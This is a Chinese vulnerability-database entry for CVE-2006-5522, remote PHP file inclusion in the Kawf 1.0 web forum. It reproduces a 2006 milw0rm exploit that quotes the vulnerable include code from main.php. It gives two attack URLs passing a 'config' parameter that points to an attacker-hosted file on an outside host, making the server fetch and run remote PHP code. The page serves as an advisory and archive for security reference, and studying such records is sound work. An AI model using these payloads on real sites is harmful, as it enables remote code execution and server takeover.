Johannes Erdfelt Kawf 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111342 漏洞类型 输入验证
发布时间 2006-10-21 更新时间 2006-10-30
CVE编号 CVE-2006-5522 CNNVD-ID CNNVD-200610-437
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2607
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-437
|漏洞详情
JohannesErdfeltKawf1.0及更早版本中存在多个PHP远程文件包含漏洞。远程攻击者可以通过(1)main.php或(2)user/account/main.php的config参数中的URL,执行任意PHP代码。
|漏洞EXP
####################################################################
#       kawf (config)  Remote File Include
#---------------------------------------------------------------------------------------------
#       Kawf is a web forum written in PHP4 using MySQL
#        v. 1.0 and all below
#--------------------------------------------------------------------------------------------
#       download :
#       http://sourceforge.net/projects/kawf
#--------------------------------------------------------------------------------------------
#       see the bug file:
#       http://koders.com/php/fid2508A4F431485FD5A1154465381E69E592D8D005.aspx?s=require
#--------------------------------------------------------------------------------------------
#       bug in  :
#       main.php
#--------------------------------------------------------------------------------------------
#code : { i wrote all code for str0ke :D :D } include in line 13 ::
#                                                       #
#                                                       /* First setup the path */
#                                                       $include_path = "$srcroot/include:$srcroot/user/account";
#                                                       if (isset($include_append))
#                                                         $include_path .= ":" . $include_append;
#
#                                                       $old_include_path = ini_get("include_path");
#                                                       if (!empty($old_include_path))
#                                                         $include_path .= ":" . $old_include_path;
#                                                       ini_set("include_path", $include_path);
#
#                                                       include_once("$config.inc");
#                                                       require_once("sql.inc");
#                                                       require_once("util.inc");
#                                                       require_once("page.inc");
#                                                       require_once("forumuser.inc");
#
#                                                       sql_open($database);
#
#                                                       include("index.php");
#
#                                                       sql_close();
#                                                       ?>
#--------------------------------------------------------------------------------------------
#       exploit:
#          kawf/user/account/main.php?config=http://members.lycos.co.uk/o0xxdark0o3/ms.txt?
#                                          or
#         (path)/main.php?config=http://members.lycos.co.uk/o0xxdark0o3/ms.txt?
#--------------------------------------------------------------------------
#       greetz :  str0ke ,  c0ldz3r0 ,  all members in  xp10.cc , dm3r7.com , 4azhar.com all my friend in msn :D
#      inter_vieri_21 dont play runescape :d :d
#-------------------------------------------------------------------------
#      by o0xxdark0o
# i think... so that... i m here
#  o0xxdark0o@msn.com
####################################################################

# milw0rm.com [2006-10-21]
|参考资料

来源:XF
名称:kawf-main-file-include(29709)
链接:http://xforce.iss.net/xforce/xfdb/29709
来源:BID
名称:20659
链接:http://www.securityfocus.com/bid/20659
来源:MILW0RM
名称:2607
链接:http://www.milw0rm.com/exploits/2607
来源:MILW0RM
名称:2607
链接:http://milw0rm.com/exploits/2607